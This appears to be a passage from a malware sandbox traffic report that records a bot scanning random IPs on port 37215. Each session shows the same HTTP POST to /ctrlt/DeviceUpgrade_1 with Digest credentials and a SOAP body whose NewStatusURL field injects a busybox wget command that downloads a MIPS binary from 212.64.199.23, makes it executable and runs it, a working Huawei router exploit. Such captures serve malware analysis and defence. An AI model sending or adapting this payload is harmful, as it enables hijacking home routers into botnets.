                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3192.168.2.1533992197.172.1.6237215
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:16.747920036 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4192.168.2.1548016197.249.19.1037215
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:16.751177073 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5192.168.2.1554460197.212.217.23637215
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:16.753866911 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6192.168.2.153750041.80.3.18937215
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:16.757272959 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7192.168.2.154456441.156.70.10837215
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:16.759924889 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8192.168.2.1549706197.159.207.22837215
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:16.763555050 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9192.168.2.153429441.216.131.12537215
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:16.766545057 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10192.168.2.155750041.229.202.4337215
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:16.769980907 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          11192.168.2.154211641.197.212.10537215
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:16.772777081 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          12192.168.2.1535832197.157.167.23637215
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:16.776264906 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
